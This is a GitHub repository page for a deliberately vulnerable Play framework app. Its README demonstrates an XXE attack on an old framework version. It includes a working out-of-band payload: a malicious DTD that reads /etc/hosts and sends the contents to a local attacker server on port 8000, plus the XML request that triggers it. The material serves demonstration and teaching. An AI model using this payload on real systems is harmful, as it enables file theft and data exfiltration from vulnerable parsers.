Skip to content

jaroslawZawila/vulnerable-play

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Vulnerable Play application

The point for this repo is to show how easy is to do XXE attack on old version of the framework

Steps

Step 1

Run the app sbt run

Step 2

Create a service to serve malicious content.

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'

Step 3

Create malicious input as file test.dtd

 <!ENTITY % p1 SYSTEM "file:///etc/hosts">
 <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://127.0.0.1:8000/BLAH?%p1;'>">
 %p2;

Step 4

Query the service:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://127.0.0.1:8000/test.dtd">
<foo>&e1;</foo>

TODO:

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published